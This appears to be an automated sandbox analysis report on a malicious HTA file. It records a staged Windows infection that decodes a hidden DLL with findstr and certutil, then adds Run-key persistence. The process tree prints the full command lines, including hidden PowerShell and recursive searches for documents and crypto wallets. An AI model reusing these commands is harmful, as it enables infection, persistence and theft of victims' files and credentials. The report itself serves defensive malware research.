Analysis
-
max time kernel
149s -
max time network
152s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
02/11/2024, 08:04
Static task
static1
Behavioral task
behavioral1
Sample
bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta
Resource
win10v2004-20241007-en
General
-
Target
bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta
-
Size
70KB
-
MD5
4b4622857d5a8049c8eabc65cbbf9759
-
SHA1
3c0b1087394f1584a53ae19a60eeee26adf5323a
-
SHA256
bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234
-
SHA512
bd4e13fc189cff886ac5097814fb35145d897c8f3626df93ba1413fdb38117d3df48152fa099c3bfb4852760425bb97f07aa6020e61331580c7780604285cf9e
-
SSDEEP
1536:qzp24Z02CaLYQZ3h+3vsA7gI8GLRMsQMIF9AbR0F:ErZFJYYx+fsAD8qqsQMIFKC
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 2844 rundll32.exe 6 2844 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1928 powershell.exe -
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\VMware, Inc.\VMware Tools rundll32.exe -
Loads dropped DLL 8 IoCs
pid Process 2724 rundll32.exe 2724 rundll32.exe 2724 rundll32.exe 2724 rundll32.exe 2844 rundll32.exe 2844 rundll32.exe 2844 rundll32.exe 2844 rundll32.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts rundll32.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\Network Service = "rundll32 C:\\Users\\Admin\\AppData\\Local\\netserv32.dll,MainWork" rundll32.exe -
pid Process 2944 cmd.exe 3000 cmd.exe 2984 certutil.exe 2204 certutil.exe -
resource yara_rule behavioral1/files/0x0008000000016d13-32.dat upx behavioral1/memory/2724-33-0x0000000000220000-0x000000000023F000-memory.dmp upx behavioral1/memory/2844-53-0x000007FEF7DE0000-0x000007FEF7DFF000-memory.dmp upx behavioral1/memory/2844-64-0x0000000180000000-0x0000000180127000-memory.dmp upx behavioral1/memory/2844-67-0x0000000180000000-0x0000000180127000-memory.dmp upx behavioral1/memory/2844-68-0x0000000180000000-0x0000000180127000-memory.dmp upx behavioral1/memory/2844-118-0x000007FEF7DE0000-0x000007FEF7DFF000-memory.dmp upx behavioral1/memory/2844-121-0x000007FEF7DE0000-0x000007FEF7DFF000-memory.dmp upx behavioral1/memory/2844-134-0x000007FEF7DE0000-0x000007FEF7DFF000-memory.dmp upx behavioral1/memory/2844-139-0x000007FEF7DE0000-0x000007FEF7DFF000-memory.dmp upx behavioral1/memory/2844-140-0x000007FEF7DE0000-0x000007FEF7DFF000-memory.dmp upx -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language certutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language certutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NOTEPAD.EXE -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 2604 NOTEPAD.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2844 rundll32.exe 2844 rundll32.exe 2844 rundll32.exe 2844 rundll32.exe 1928 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1928 powershell.exe -
Suspicious use of WriteProcessMemory 60 IoCs
description pid Process procid_target PID 2496 wrote to memory of 2944 2496 mshta.exe 30 PID 2496 wrote to memory of 2944 2496 mshta.exe 30 PID 2496 wrote to memory of 2944 2496 mshta.exe 30 PID 2496 wrote to memory of 2944 2496 mshta.exe 30 PID 2496 wrote to memory of 3000 2496 mshta.exe 32 PID 2496 wrote to memory of 3000 2496 mshta.exe 32 PID 2496 wrote to memory of 3000 2496 mshta.exe 32 PID 2496 wrote to memory of 3000 2496 mshta.exe 32 PID 2944 wrote to memory of 2864 2944 cmd.exe 34 PID 2944 wrote to memory of 2864 2944 cmd.exe 34 PID 2944 wrote to memory of 2864 2944 cmd.exe 34 PID 2944 wrote to memory of 2864 2944 cmd.exe 34 PID 3000 wrote to memory of 2756 3000 cmd.exe 35 PID 3000 wrote to memory of 2756 3000 cmd.exe 35 PID 3000 wrote to memory of 2756 3000 cmd.exe 35 PID 3000 wrote to memory of 2756 3000 cmd.exe 35 PID 2944 wrote to memory of 2984 2944 cmd.exe 36 PID 2944 wrote to memory of 2984 2944 cmd.exe 36 PID 2944 wrote to memory of 2984 2944 cmd.exe 36 PID 2944 wrote to memory of 2984 2944 cmd.exe 36 PID 3000 wrote to memory of 2204 3000 cmd.exe 37 PID 3000 wrote to memory of 2204 3000 cmd.exe 37 PID 3000 wrote to memory of 2204 3000 cmd.exe 37 PID 3000 wrote to memory of 2204 3000 cmd.exe 37 PID 3000 wrote to memory of 2724 3000 cmd.exe 38 PID 3000 wrote to memory of 2724 3000 cmd.exe 38 PID 3000 wrote to memory of 2724 3000 cmd.exe 38 PID 3000 wrote to memory of 2724 3000 cmd.exe 38 PID 3000 wrote to memory of 2724 3000 cmd.exe 38 PID 3000 wrote to memory of 2724 3000 cmd.exe 38 PID 3000 wrote to memory of 2724 3000 cmd.exe 38 PID 2724 wrote to memory of 2844 2724 rundll32.exe 39 PID 2724 wrote to memory of 2844 2724 rundll32.exe 39 PID 2724 wrote to memory of 2844 2724 rundll32.exe 39 PID 2724 wrote to memory of 2844 2724 rundll32.exe 39 PID 2944 wrote to memory of 2604 2944 cmd.exe 40 PID 2944 wrote to memory of 2604 2944 cmd.exe 40 PID 2944 wrote to memory of 2604 2944 cmd.exe 40 PID 2944 wrote to memory of 2604 2944 cmd.exe 40 PID 2844 wrote to memory of 1928 2844 rundll32.exe 42 PID 2844 wrote to memory of 1928 2844 rundll32.exe 42 PID 2844 wrote to memory of 1928 2844 rundll32.exe 42 PID 2844 wrote to memory of 1828 2844 rundll32.exe 44 PID 2844 wrote to memory of 1828 2844 rundll32.exe 44 PID 2844 wrote to memory of 1828 2844 rundll32.exe 44 PID 2844 wrote to memory of 1732 2844 rundll32.exe 46 PID 2844 wrote to memory of 1732 2844 rundll32.exe 46 PID 2844 wrote to memory of 1732 2844 rundll32.exe 46 PID 2844 wrote to memory of 1260 2844 rundll32.exe 48 PID 2844 wrote to memory of 1260 2844 rundll32.exe 48 PID 2844 wrote to memory of 1260 2844 rundll32.exe 48 PID 2844 wrote to memory of 448 2844 rundll32.exe 50 PID 2844 wrote to memory of 448 2844 rundll32.exe 50 PID 2844 wrote to memory of 448 2844 rundll32.exe 50 PID 2844 wrote to memory of 2392 2844 rundll32.exe 52 PID 2844 wrote to memory of 2392 2844 rundll32.exe 52 PID 2844 wrote to memory of 2392 2844 rundll32.exe 52 PID 2844 wrote to memory of 2924 2844 rundll32.exe 54 PID 2844 wrote to memory of 2924 2844 rundll32.exe 54 PID 2844 wrote to memory of 2924 2844 rundll32.exe 54
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2496 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cd /d C:\Users\Admin\AppData\Local\Temp & findstr /b "a2ZneGw7" "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta">1.log & certutil -decode -f 1.log password.txt & del 1.log && password.txt2⤵
- Deobfuscate/Decode Files or Information
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Windows\SysWOW64\findstr.exefindstr /b "a2ZneGw7" "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta"3⤵
- System Location Discovery: System Language Discovery
PID:2864
-
-
C:\Windows\SysWOW64\certutil.execertutil -decode -f 1.log password.txt3⤵
- Deobfuscate/Decode Files or Information
- System Location Discovery: System Language Discovery
PID:2984
-
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\password.txt3⤵
- System Location Discovery: System Language Discovery
- Opens file in notepad (likely ransom note)
PID:2604
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cd /d C:\Users\Admin\AppData\Local & findstr /b "TVqQAAMAAA" "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta">1.log & certutil -decode -f 1.log netserv32.dll & del 1.log & rundll32 netserv32.dll,MainWork2⤵
- Deobfuscate/Decode Files or Information
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3000 -
C:\Windows\SysWOW64\findstr.exefindstr /b "TVqQAAMAAA" "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta"3⤵
- System Location Discovery: System Language Discovery
PID:2756
-
-
C:\Windows\SysWOW64\certutil.execertutil -decode -f 1.log netserv32.dll3⤵
- Deobfuscate/Decode Files or Information
- System Location Discovery: System Language Discovery
PID:2204
-
-
C:\Windows\SysWOW64\rundll32.exerundll32 netserv32.dll,MainWork3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2724 -
C:\Windows\system32\rundll32.exerundll32 netserv32.dll,MainWork4⤵
- Blocklisted process makes network request
- Looks for VMWare Tools registry key
- Loads dropped DLL
- Accesses Microsoft Outlook accounts
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2844 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -w hidden Compress-Archive -CompressionLevel Optimal -Path "C:\Users\Admin\AppData\Local\Temp\nsv9B18.tmp" "C:\Users\Admin\AppData\Local\micro.log.zip"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1928
-
-
C:\Windows\system32\cmd.execmd.exe /c dir C:\Users\Admin\*.hwp C:\Users\Admin\*.pdf C:\Users\Admin\*.doc C:\Users\Admin\*.docx C:\Users\Admin\*.xls C:\Users\Admin\*.xlsx C:\Users\Admin\*.zip C:\Users\Admin\*.rar C:\Users\Admin\*.egg C:\Users\Admin\*.txt C:\Users\Admin\*.jpg C:\Users\Admin\*.png C:\Users\Admin\*.jpeg C:\Users\Admin\*.alz /s >> "c:\users\admin\appdata\local\netlist.log"5⤵PID:1828
-
-
C:\Windows\system32\cmd.execmd.exe /c dir C:\Users\Admin\*wallet* C:\Users\Admin\UTC--* /s >> "c:\users\admin\appdata\local\netlist.log"5⤵PID:1732
-
-
C:\Windows\system32\cmd.execmd.exe /c dir d:\*.hwp d:\*.pdf d:\*.doc d:\*.docx d:\*.xls d:\*.xlsx d:\*.zip d:\*.rar d:\*.egg d:\*.txt d:\*.jpg d:\*.png d:\*.jpeg d:\*.alz /s >> "c:\users\admin\appdata\local\netlist.log"5⤵PID:1260
-
-
C:\Windows\system32\cmd.execmd.exe /c dir d:\*wallet* d:\UTC--* /s >> "c:\users\admin\appdata\local\netlist.log"5⤵PID:448
-
-
C:\Windows\system32\cmd.execmd.exe /c dir f:\*.hwp f:\*.pdf f:\*.doc f:\*.docx f:\*.xls f:\*.xlsx f:\*.zip f:\*.rar f:\*.egg f:\*.txt f:\*.jpg f:\*.png f:\*.jpeg f:\*.alz /s >> "c:\users\admin\appdata\local\netlist.log"5⤵PID:2392
-
-
C:\Windows\system32\cmd.execmd.exe /c dir f:\*wallet* f:\UTC--* /s >> "c:\users\admin\appdata\local\netlist.log"5⤵PID:2924
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Deobfuscate/Decode Files or Information
1Modify Registry
2Virtualization/Sandbox Evasion
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
59KB
MD571593a662d03e58b27b29ab199a6d7b5
SHA1d24e55399d35ac3a25f1b6a8d3bdd0e3e37db5d2
SHA256e6da91d2fc4d3029e3915e9f7fc9586bf76f8ee024082c05ee4e5bf0f174c237
SHA512c8005c9131b575f15ccd8bcde0fe66f820fff8b4c54800fdcaf814c1aede5f98343854276c301210c0935bf2669f925eafc2ecd15ff88496ededd918bfca3b07
-
Filesize
22B
MD52ac7510166832b4a6e4344f37d944578
SHA1c766dd5112d72620614842d4bf0e986c34c5a2d0
SHA25609e4c6d57fbf21a95fab469149ac50d73ee046f2bc2e57b6565eb0e9adf9e1ad
SHA512ecb5c29e8e1d81b914b1d4c3e2787cf2b78d5707473f368aa48df6af1b7235adac5f96ccd43cfc0501f93640b52dd4b06905c889ffd0e9b7c989e150c89e521a
-
Filesize
14B
MD56a0e721cb89a06736206b91af92239cd
SHA1bb87db8bbcb512a584c45c80504fc21a0a972b3a
SHA256a5a56f7eed7db360188ca88386bed5c84a8146b99ece4e68a3abfdbb5f091015
SHA512c9921cafd2a284c3bc32b845685e25f03bc9fbaa380dbecbe8bfd9ec4992d5cf4a832e462cf097bcbc12f1ae3b00a0c8e7688be373aede81a9bd331d400b6a0c
-
Filesize
478KB
MD5de9438683614ccf3f0316139418985a9
SHA1dcbbfb18c16f4bf9025233e6ecf42be64c33932d
SHA256d5ec8265369b5f52a14b039c1f9495a343a9755a89b0c48db5983c94d140f18b
SHA512925a919ecbe169adc2ebb10b9f93cc33ab5ba44794d3fccd0d7f2faa49c8a35b46e3c6779d0e357122433461bf48fc4af2f9571fae0aa11fd85c9dcc26a47470
-
Filesize
139KB
MD56199c9d0ad1df4105c85ae041e833a0e
SHA1c9016a4bcd8bd2ea646dfa86e2c9c59cd9f50fd1
SHA256c45b1bb615385f2b2b2c1bfb29646a89ef9beb9c4f00cbb5f16c02171c61bcf4
SHA512b2b972ba63cfb93c6b59634ecf5f8ffda04c74ba9ee86dbd8fefea43ff408f86718a75a0e9282ba5fe122cb3079511847c6775393e1e2d5c556ec3e8ab599de3
-
Filesize
8KB
MD54c3a362b3f3e30e0d09cf23cf206d4f3
SHA18c83105c017fdd64b2bc094f295bfaa8ce074b39
SHA25647efee3b0891b28c7ad69ba95c06f5fd2a45e0df0e4ec62307a24793a51b52bd
SHA512c78174e522de99a4774b764d0b465d8dc0035d4aa4e46a5306f3985afc814af0290c1af11b78c0656d6915b0ddc36ecc726a21666694ebecc87277120f9dfda4
-
Filesize
9KB
MD538eb30a99834452a25809864e7116beb
SHA180271700c164e13a7a871d8530a71898bf4a64bc
SHA25677062eba27314013f04f6a3aad6c6d60d5e2a9a9a289ea34fd83e87ccf9167b0
SHA51248e013c5ca505310ee98f059c84fc619e1e41b03ab3fc9248688194e75eaa8a56bc7a6a68cb100c42115170b5791ba29d66ad381f2e4298660f0c72f8c4ed208
-
Filesize
44KB
MD556d4fcfa7eb3a84740081264c5c0f10a
SHA106edf5464d2cfe1a75f3600c9039eabab97248bd
SHA2565a18a29791cfb18767a43bebb61f923e64be7988235213678514007174f60b3e
SHA512df622d9aebc8b9367219777216ba7e21942974e048fa40233fb17d17a85d940f8301ab4c605703cfa4b9ffdc61f2095b2a96b6256d017b445e40e94aedfd8609